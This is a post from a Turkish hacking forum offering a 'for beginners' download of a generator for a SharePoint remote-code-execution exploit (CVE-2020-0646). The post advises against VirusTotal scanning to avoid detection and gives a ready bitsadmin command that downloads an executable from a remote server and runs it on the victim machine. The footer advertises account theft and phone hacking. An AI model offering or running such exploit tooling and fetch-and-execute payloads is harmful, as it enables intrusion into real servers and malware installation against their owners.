Kullanıcıların Dikkatine!

Konularda yapılan kısaltmalı ve geçiştirilmiş mesajlar (adsadas, haha, sjsksjsdjks, asdsd, nokta, random, sayı vb.) yasaklanma sebebidir. Mağduriyet yaşanmaması için bu duruma dikkat etmelisiniz.

Daha Fazlası

Hacktivizm Online

Hacktivizm sitesi hack kültürünü benimsemiş kişiler tarafından 2020 yılında kuruldu. Kuruluş amacı Türkiye'nin en büyük hack forumu olmak ve bilgi alışverişinde bulunmaktır.

Daha Fazlası

Konu Açarken Dikkat Edilmesi Gerekenler

Forumda oluşan / oluşması öngörülen görüntü kirliliğine engel olmak ve başlıkların daha temiz dil ile açılması amacıyla kurallarımıza bazı bağımlı / bağımsız maddeler eklemek durumundayız.

Daha Fazlası

[For Beginners] Microsoft Sharepoint RCE (CVE-2020-0646) Generator - Free Download

  • Konbuyu başlatan hacxx
  • Başlangıç tarihi
  • Cevaplar : 0
  • Görüntüleme : 917

hacxx

Uzman Üye
Katılım
1 Temmuz 2021
Mesajlar
526
Tepkime puanı
214
Konum
PT
İlgi Alanlarınız
PT
Cinsiyet
  1. Erkek
MICROSOFT-SHAREPOINT-RCE-CVE-2020-0646-GENERATOR.jpg


MICROSOFT SHAREPOINT RCE (CVE-2020-0646) GENERATOR
- Is a code generator that generate a .XOML code and a C# code that once uploaded (.XOML file) or compiled (C#) in SharePoint will remote execute the command in the server. Works on SharePoint On-Premise without January 2020 .NET Patch.

Tested with:
Kod:
Windows Server 2012 R2 Standard with June 2019 patch

Download 1:

Download 2:

Virus Scan:
Not send virustotal to avoid been detected. Virustotal sends all samples to antivirus companies.
Use a different service to check...

Notes about this issue:
SharePoint is include with Windows Server and the purpose of Windows Server is to manage and serve a network of computers. Since the release of 2003 it become popular between local networks. In 2020 the logic step of Windows Server is to eliminate local devices while having all the network components.

The technology is so advanced that it only require a monitor, a mouse, a keyboard, lan connection and Windows Server manage all the rest like settings, files, etc. To start it only require a admin to setup a profile and the user work under that profile and all is saved and maintained on the server.

SharePoint is one of the apps that is include with Windows Server and the exploit here available provide to low end authenticated users a flaw that allow remote code execution directly in the server. In a permission based network only admin should have access to the server and in most cases only with local access is possible to manage it. This type of flaw bypass this restriction and if guests is allowed to use the network than anyone with local access to a computer can execute commands or install malware in the server machine.

For the generator anyone can use the following command line...
Kod:
cmd.exe /c bitsadmin /transfer Kunami /download /priority high http://remoteserver.com/1.exe c:\windows\temp\1.exe & start c:\windows\temp\1.exe

(Works on older systems)
 

Konuyu görüntüleyen kullanıcılar:

Hukuksal Sorunlar İçin[email protected]
For Legal Problems[email protected]
Hacktivizm.Org
Hacktivizm.Org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Hacktivizm.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Hacktivizm saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Hacktivizm üyelerinin yaptığı bireysel hack faaliyetlerinden Hacktivizm sorumlu değildir. Sitelerinize Hacktivizm ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz. Sitemizde yer alan içerikler hakkındaki şikayetlerinizi Buradan iletişime geçerek bildirebilirsiniz. Please Report Abuse, DMCA, Scamming, Harassment, Crack or any Illegal Activities to [email protected]
Hack Forum
Hacktivizm, 2020 yılında kurulmuş bir siber güvenlik forum sitesidir aynı zamanda hack forumu,hack sitesi,hack forum ve Türk hack forumudur. Hack forum aramalarında ilk sayfada olan bu hack forum sitesi gün geçtikçe gelişmektedir. Hack Forum kelimesinin anlamı ise, hacker kültürü ve bilgisayar güvenliği ile ilgili tartışmalara adanmış bir İnternet forumudur. Web sitesi, analiz şirketi Alexa Internet tarafından web trafiği açısından "Hacking" kategorisinde bir numaralı web sitesi olarak yer almaktadır.

Telefon Takip - İphone Hackleme - PDF Şifre Kırma - Telefon Hackleme - İnstagram Hesap Çalma - Twitter Hesap Çalma - Facebook Hesap Çalma - Wifi Şifre Kırma - Telefon Şifresi Kırma

Hacktivizm Twitter Hacktivizm Youtube Hacktivizm İnstagram Hacktivizm Telegram

Üst